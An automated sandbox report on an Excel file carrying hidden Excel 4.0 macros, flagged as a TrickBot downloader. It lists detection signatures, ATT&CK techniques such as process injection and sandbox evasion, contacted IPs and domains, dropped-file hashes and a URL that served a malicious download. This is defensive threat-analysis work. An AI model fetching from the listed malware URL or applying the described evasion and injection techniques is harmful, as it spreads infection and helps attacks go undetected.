Analysis Report SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189
Overview
General Information
Sample Name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls) |
Analysis ID: | 355607 |
MD5: | 7810830918f82b2acdcdb05d2d404bad |
SHA1: | 095201dab7b66c1268e3921356a2870ad1dc628c |
SHA256: | c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81 |
Most interesting Screenshot: |
Detection
Hidden Macro 4.0 TrickBot
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Trickbot
Allocates memory in foreign processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query network adapter information
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC | |
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell | Show sources |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: |
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain | Show sources |
Source: | Avira URL Cloud: |
Source: | Code function: |
Compliance: |
---|
Uses insecure TLS / SSL version for HTTPS connection | Show sources |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Uses new MSVCR Dlls | Show sources |
Source: | File opened: |
Binary contains paths to debug symbols | Show sources |
Source: | Binary string: |
Source: | Code function: | ||
Source: | Code function: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | Memory has grown: |
Source: | Code function: | ||
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking: |
---|
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) | Show sources |
Source: | Snort IDS: | ||
Source: | IP Address: | ||
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
System Summary: |
---|
Found malicious Excel 4.0 Macro | Show sources |
Source: | Initial sample: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Memory allocated: | ||
Source: | Memory allocated: |
Source: | Code function: | ||
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | Code function: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | System information queried: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Code function: | ||
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: |
Source: | Process information set: | ||
Malware Analysis System Evasion: |
---|
Found evasive API chain (trying to detect sleep duration tampering with parallel thread) | Show sources |
Source: | Function Chain: |
Tries to detect virtualization through RDTSC time measurements | Show sources |
Source: | RDTSC instruction interceptor: |
Source: | Code function: |
Source: | Code function: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | ||
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: | ||
HIPS / PFW / Operating System Protection Evasion: |
---|
Allocates memory in foreign processes | Show sources |
Source: | Memory allocated: |
Writes to foreign memory regions | Show sources |
Source: | Memory written: | ||
Source: | Memory written: |
Source: | Process created: | ||
Source: | Binary or memory string: | ||
Source: | Queries volume information: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Access Token Manipulation1 | Masquerading121 | OS Credential Dumping | Query Registry1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Process Injection212 | Disable or Modify Tools2 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Extra Window Memory Injection1 | Access Token Manipulation1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection212 | NTDS | System Network Configuration Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information2 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
7% | Virustotal | Browse |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak | ||
11% | Metadefender | Browse | ||
6% | ReversingLabs | Win32.Trojan.Trickpak |
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
5% | Virustotal | Browse | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
ident.me | 176.58.123.25 | true | false | | unknown |
chipmania.it | 185.81.0.78 | true | false | | unknown |
www.chipmania.it | unknown | unknown | false | | unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | low |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | high |
| | false | | low |
| | false | | high |
| | false | | unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
142.202.191.164 | unknown | Reserved | 398019 | DYNUUS | true | |
45.155.173.242 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | true | |
185.81.0.78 | unknown | Italy | 52030 | SERVERPLAN-ASIT | false | |
194.5.249.156 | unknown | Romania | 64398 | NXTHOST-64398NXTHOSTCOM-NXTSERVERSSRLRO | false | |
200.52.147.93 | unknown | Honduras | 27932 | RedesyTelecomunicacionesHN | true | |
94.140.114.136 | unknown | Latvia | 43513 | NANO-ASLV | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 355607 |
Start date: | 20.02.2021 |
Start time: | 03:19:19 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 4s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.29189 (renamed file extension from 29189 to xls) |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 8 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.troj.expl.evad.winXLS@9/11@3/6 |
EGA Information: | Failed |
HDC Information: | |
HCA Information: | Failed |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
03:19:40 | API Interceptor | |
03:19:40 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
142.202.191.164 | Get hash | malicious | Browse | ||
45.155.173.242 | Get hash | malicious | Browse | ||
185.81.0.78 | Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ident.me | Get hash | malicious | Browse |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
DYNUUS | Get hash | malicious | Browse |
COMBAHTONcombahtonGmbHDE | Get hash | malicious | Browse |
SERVERPLAN-ASIT | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
8c4a22651d328568ec66382a84fc505f | Get hash | malicious | Browse |
Dropped Files |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\8[1].jjkes | Get hash | malicious | Browse | ||
C:\Users\user\BASE.BABAA | Get hash | malicious | Browse | ||
Created / dropped Files |
---|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 328 |
Entropy (8bit): | 3.066589575667779 |
Encrypted: | false |
SSDEEP: | 6:kKo4PbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:5W3kPlE99SNxAhUeo+aKt |
MD5: | 46ABC96344F13B0AFD895852E597F1B2 |
SHA1: | E8B264BB149858AEF57245C350FD93636B8736C5 |
SHA-256: | E821AE09E22728DC49926ADEA5C6684D93A86343956BE54515FFD6CCA30944E2 |
SHA-512: | CF4ECB5D0F6CC69A071650368E2B990136A8CEC81EDF151267B5E6332DFC8C09BCFFE1D5CB75FF9E549EEA47FE3DF9211123B1CCE1A7A362B83E46242D8E7BAA |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
IE Cache URL: | http://www.chipmania.it/mails/open.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 155530 |
Entropy (8bit): | 7.660528560276826 |
Encrypted: | false |
SSDEEP: | 3072:YxWVpupSzxNEBBD+Os7/xxkKCtRbsYO1entseoXXJ:YEGSzx0dmxk7RbsYsKtseoX5 |
MD5: | 580CA80638F8E187610170B9B916F1A6 |
SHA1: | 22C0E7E4869EFBBBB899C07C501F360B76A9BCD6 |
SHA-256: | 259129D6D4838E991E927B042A0460F61ABB90E78E833EFDF5F832339A9246CC |
SHA-512: | EDDC6C12D8E303A5937B21F0DFB02E4708A16CB57FAED8E206EA8815D239E84D8E405FDB32232A1E0054BDD9562D962AE35139953FA77942BEC8F5285F6FAC6F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 59134 |
Entropy (8bit): | 7.995450161616763 |
Encrypted: | true |
SSDEEP: | 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk |
MD5: | E92176B0889CC1BB97114BEB2F3C1728 |
SHA1: | AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443 |
SHA-256: | 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3 |
SHA-512: | CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Windows\System32\wermgr.exe |
File Type: | |
Category: | modified |
Size (bytes): | 152788 |
Entropy (8bit): | 6.316654432555028 |
Encrypted: | false |
SSDEEP: | 1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx |
MD5: | 64FEDADE4387A8B92C120B21EC61E394 |
SHA1: | 15A2673209A41CCA2BC3ADE90537FE676010A962 |
SHA-256: | BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745 |
SHA-512: | 655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.46889222662012 |
Encrypted: | false |
SSDEEP: | 12:85Q5n1LgXg/XAlCPCHaXgzB8IB/PEGgX+Wnicvbf+bDtZ3YilMMEpxRljKITdJP8:85GP/XTwz6IkYeWDv3qhrNru/ |
MD5: | 779E4D79BFB6B9A90E65743AA9697FB2 |
SHA1: | DE951D26E777E72F62B2904EF5EA88F2B3963E65 |
SHA-256: | 286A3C533A8648DCE42D7089C2ED442E1A6B348F1320956C5D9F60D788C52581 |
SHA-512: | E0D8C5A51EDAC95856EA83344F369747E5FD8B68E5A7EC9FF7A14C28C86D2641CBE84B75F7D52D5B8035A5396DC671288F967F569FE56E8FF62960339EE89B49 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2368 |
Entropy (8bit): | 4.572683374026909 |
Encrypted: | false |
SSDEEP: | 48:8j/d/XT3I3HChveHCLhQh2j/d/XT3I3HChveHCLhQ/:8jl/XLI3ihLhQh2jl/XLI3ihLhQ/ |
MD5: | 2514DDDEF94E783EAAF46CEC52AA49BB |
SHA1: | 5244D1442A2CB863E75200CC1ED7AF6CCB947A9F |
SHA-256: | 13A5420DD8AC93A70A602CD2500697C31625BF764AD80A587CFE38CB9E5A41D6 |
SHA-512: | 21E12061C0D630EE11259A3C1B8D514E28718BAE1107D0B18C3F103395930B9DFDEDE6AD6A8A1E78AF198AC1570B598F31737B7A56F2A769A9371BE5F5EEF8BE |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 185 |
Entropy (8bit): | 4.876408116811588 |
Encrypted: | false |
SSDEEP: | 3:oyBVomM0bcsoMWgou4ouscbcsoMWgou4omM0bcsoMWgou4ov:dj60wsoMW+4VwsoMW+460wsoMW+4y |
MD5: | 53737609850FAE6F3241AABAB5206886 |
SHA1: | 5D98430F4BA269530B66CCE97C7CF6A7605BD3D2 |
SHA-256: | 4C6E65EC2DDC6544CDC21215319A360903C27178F5FBEC101D3B23EE8F74F098 |
SHA-512: | 074A0EE29DF75C11183AA51A38C97C8631EBFEB7852EB0F2B4A37D2FC775E9824ED14292D24D158719730FCF5129F01FF680C0E13B5EF88A5C50D9C0C5DCA7F4 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4591104 |
Entropy (8bit): | 5.0540147937501265 |
Encrypted: | false |
SSDEEP: | 49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9 |
MD5: | 25056DF6D3546DE971EAFE5DA5F9AE44 |
SHA1: | 179555B3D0391E45DF29E651B8ED0342D02FE88A |
SHA-256: | AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB |
SHA-512: | 8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50 |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 177025 |
Entropy (8bit): | 7.239945092303017 |
Encrypted: | false |
SSDEEP: | 3072:zccKoSsxzNDZLDZjlbR868O8KL5L+4iK2xEtjPOtioVjDGUU1qfDlaGGx+cL2QnI:4cKoSsxzNDZLDZjlbR868O8KL5L+4iK0 |
MD5: | 284F711E4245DF9D1706EED70EB61B89 |
SHA1: | BB3DF0DAFA04AEA74F8C5768C3FDBF7710F470C3 |
SHA-256: | F9C84A4A89AA18C68EC569DA066C3D6B92872DBB85665184E3311123BB75608D |
SHA-512: | E5F0A769EA0FA2841B5AE77797D10D7540FB25F5464F4A4616BA9B63CEDC744581ABE365A6B14190A022824596F1397124C46B124F6C224B0096500732B74442 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.195176543915214 |
TrID: |
|
File name: | SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls |
File size: | 168960 |
MD5: | 7810830918f82b2acdcdb05d2d404bad |
SHA1: | 095201dab7b66c1268e3921356a2870ad1dc628c |
SHA256: | c217faa8b517c65418d18c7b14ccb3c307cdbd0b477a7d09332aad25dcd52d81 |
SHA512: | 0908d69aec61aa32b134105a897c98726c2817f18faef03cf855db0d1928c8022850efd7e4b5784ab51d2faf204cd5bcfe3785974ddfc8dc0871605083240253 |
SSDEEP: | 3072:bScKoSsxzNDZLDZjlbR868O8KlVH3jiKq7uDphYHceXVhca+fMHLtyeGxcl8OUM3:OcKoSsxzNDZLDZjlbR868O8KlVH3jiKy |
File Content Preview: | ........................>.......................H...........................E...F...G.......................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "SecuriteInfo.com.Exploit.Siggen3.10350.14349.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-02-19 10:48:36 |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 917504 |
Streams |
---|
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.357299206868 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 ec 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e3 04 00 00 |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 0.247217286775 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 157800 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 157800 |
Entropy: | 7.46869820242 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . |
